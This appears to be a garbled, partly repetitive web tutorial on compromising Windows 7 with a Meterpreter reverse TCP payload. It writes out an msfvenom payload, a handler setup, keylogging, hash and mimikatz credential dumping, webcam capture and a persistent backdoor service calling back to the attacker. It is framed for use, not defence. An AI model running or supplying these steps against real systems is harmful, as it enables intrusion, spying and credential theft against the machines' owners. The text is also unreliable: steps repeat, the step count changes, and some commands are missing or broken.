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Meterpreter Reverse TCP: A Powerful Tool for Windows 7 Hacking

# Hacking Windows 7 with Meterpreter Reverse TCP in 5 Easy Steps

**Meterpreter Reverse TCP** is one of the most powerful features the Metasploit Framework has to offer, and there are so many things you can do with it. It allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone, etc. It is also a **staged payload**, which means it consists of two parts: a **stager** and a **stage**. The stager is a small piece of code that connects back to the attacker and downloads the stage, which is the actual meterpreter shell.

In this article, we will show you how to use Meterpreter Reverse TCP to hack Windows 7 systems in 5 easy steps. We will assume that you have already installed Metasploit on your machine and have access to a vulnerable Windows 7 target.

## Step 1: Generate the executable payload

The first step is to generate an executable payload that contains the Meterpreter Reverse TCP stager. You can use **msfvenom**, a tool that comes with Metasploit, to do this. The following command will create a file called **payload.exe** in the /tmp directory:


./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe


The **-p** option specifies the payload type, which is windows/meterpreter/reverse_tcp in this case. The **LHOST** and **LPORT** options specify the IP address and port number that the stager will connect back to. The **-f** option specifies the output format, which is exe for executable. The **-o** option specifies the output file name and path.

## Step 2: Copy the executable payload to box B

The next step is to copy the executable payload to the target machine. There are many ways to do this, depending on your access level and the target's configuration. For example, you can use a USB drive, email attachment, file sharing service, social engineering technique, etc. In this example, we will assume that you have access to a web server on box B and can upload files to it.

To upload the payload.exe file to box B, you can use a tool like **curl** or **wget**. For example:


curl -F "file=@/tmp/payload.exe"


This command will use curl to upload the payload.exe file as a form field named "file" to the upload.php script on box B's web server. You can also use wget with similar options.

## Step 3: Set up the payload handler on box A

The third step is to set up a listener on box A that will receive the connection from the stager and send the stage (meterpreter shell) to it. You can use Metasploit's **multi/handler** module for this purpose. To launch Metasploit and set up the handler, run the following commands:



use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST [IP]

set LPORT 4444



This will start Metasploit and load the multi/handler module. Then it will set the same payload type, IP address and port number as before. Finally, it will run the exploit command, which will start listening for incoming connections.

## Step 4: Double-click on the malicious executable

The fourth step is to execute the payload on box B. This can be done by double-clicking on the payload.exe file or by running it from a command prompt. For example:




This will run the payload.exe file, which will connect back to box A and download the meterpreter shell.

## Step 5: View the meterpreter/payload session on box A

The final step is to view and interact with the meterpreter session on box A. You should see something like this on your Metasploit console:


[*] Sending stage (175174 bytes) to [IP]

[*] Meterpreter session 1 opened ([IP]:4444 -> [IP]:49159) at [TIME]

meterpreter >


This means that you have successfully hacked Windows 7 with Meterpreter Reverse TCP and have a meterpreter shell on box B. You can now use various meterpreter commands to explore and control box B. For example:


meterpreter > sysinfo

Computer : BOXB

OS : Windows 7 (6.1 Build 7601).

Architecture : x86

System Language : en_US


Logged On Users : 2

Meterpreter : x86/windows

meterpreter > getuid

Server username: BOXB\user

meterpreter > webcam_snap

[*] Starting...

[+] Got frame

[*] Stopped

Webcam shot saved to: /root/.msf4/loot/20210517235941_default_[IP]_webcam_123456.jpg


These commands will show you some basic information about box B, such as its OS version, architecture, system language, domain name, logged on users, etc; get its current user name; and take a snapshot from its webcam.

Congratulations! You have just learned how to hack Windows 7 with Meterpreter Reverse TCP in 5 easy steps.

Hacking Windows 7 Using meterpreter reverse tcp

# Hacking Windows 7 with Meterpreter Reverse TCP in 5 Easy Steps

## Step 6: Explore the meterpreter commands

Once you have a meterpreter session on box B, you can use various commands to explore and control it. Some of the basic and file handling commands are:

- **sysinfo**: Display system information, such as OS version, architecture, system language, etc.

- **ps**: List and display running processes, along with their process IDs (PIDs).

- **kill (PID)**: Terminate a running process given its PID.

- **getuid**: Display the user ID that meterpreter is running with.

- **upload** or **download**: Upload or download a file to or from the target machine.

- **pwd** or **lpwd**: Print the working directory on the target machine or the local machine (attacker's machine).

- **cd** or **lcd**: Change the directory on the target machine or the local machine.

- **cat**: Display the contents of a file on the target machine.

You can use the **help** command to see a summary of all the available commands and their descriptions.

## Step 7: Perform post-exploitation tasks

Meterpreter also allows you to perform various post-exploitation tasks, such as:

- **sniff**: Capture network traffic on the target machine and save it as a pcap file.

- **keyscan_start** and **keyscan_dump**: Start and dump the keystrokes captured from the target machine's keyboard.

- **hashdump**: Dump the password hashes from the target machine's SAM database.

- **portfwd**: Forward a local port to a remote service, allowing you to pivot through the target machine.

- **webcam_snap** and **webcam_stream**: Take a snapshot or stream live video from the target machine's webcam.

- **screenshot**: Take a screenshot of the target machine's desktop.

You can also load extensions to meterpreter that provide additional functionality, such as:

- **mimikatz**: Dump various credentials from memory, such as plaintext passwords, Kerberos tickets, etc.

- **python**: Load a Python interpreter and execute Python scripts on the target machine.

- **powershell**: Load a PowerShell interpreter and execute PowerShell scripts on the target machine.

You can use the **load** command to load an extension and the **use** command to use it. For example:


meterpreter > load mimikatz

Loading extension mimikatz...Success.

meterpreter > use mimikatz

meterpreter > mimikatz_command -f sekurlsa::logonPasswords


This will load and use the mimikatz extension and execute the sekurlsa::logonPasswords function, which will dump various credentials from memory. You can use the **help** command to see a list of available extensions and their commands.

## Step 8: Maintain persistence

The last step is to maintain persistence on the target machine, so that you can reconnect to it even if it reboots or loses network connection. There are many ways to achieve persistence, depending on your access level and the target's configuration. For example, you can:

- Create a backdoor service that runs your payload at startup.

- Add a registry key that runs your payload at startup.

- Inject your payload into a legitimate process that runs at startup.

- Use a scheduled task that runs your payload at regular intervals.

Meterpreter provides a handy script called **persistence** that can help you create a persistent backdoor service. To use it, run the following command:


meterpreter > run persistence -A -X -i 5 -p 4444 -r [IP]


This will create a service called MeterpreterService that runs your payload every 5 minutes and connects back to your IP address on port 4444. The -A option will add an autorun script to Metasploit that will automatically start a handler for this payload when you launch Metasploit. The -X option will start the service immediately after creation.

You can also use other options for this script, such as -S for registry key persistence, -L for logon script persistence, -U for user-level persistence, etc. You can use the **help** command to see all the available options and their descriptions.

Congratulations! You have just learned how to hack Windows 7 with Meterpreter Reverse TCP in 8 easy steps. You have also learned how to explore and control your target machine using various meterpreter commands and extensions. You have also learned how to maintain persistence on your target machine using a backdoor service. Happy hacking!

# Hacking Windows 7 with Meterpreter Reverse TCP in 8 Easy Steps

## Conclusion

In this article, we have shown you how to hack Windows 7 with Meterpreter Reverse TCP in 8 easy steps. We have covered the following topics:

- How to generate an executable payload that contains the Meterpreter Reverse TCP stager using msfvenom.

- How to copy the executable payload to the target machine using various methods.

- How to set up a listener on the attacker machine that will receive the connection from the stager and send the stage (meterpreter shell) to it using Metasploit's multi/handler module.

- How to execute the payload on the target machine and get a meterpreter session on the attacker machine.

- How to explore and control the target machine using various meterpreter commands and extensions, such as sysinfo, ps, kill, getuid, upload, download, pwd, cd, cat, sniff, keyscan_start, keyscan_dump, hashdump, portfwd, webcam_snap, webcam_stream, screenshot, mimikatz, python, powershell, etc.

- How to maintain persistence on the target machine using a backdoor service created by the persistence script.

We hope you have enjoyed this article and learned something new. Meterpreter Reverse TCP is a powerful tool for Windows 7 hacking and post-exploitation. However, it is not the only tool available. There are other payloads and techniques that you can use to achieve similar or different goals. We encourage you to experiment with them and discover their capabilities. Remember to always use your skills ethically and responsibly. Happy hacking! b99f773239


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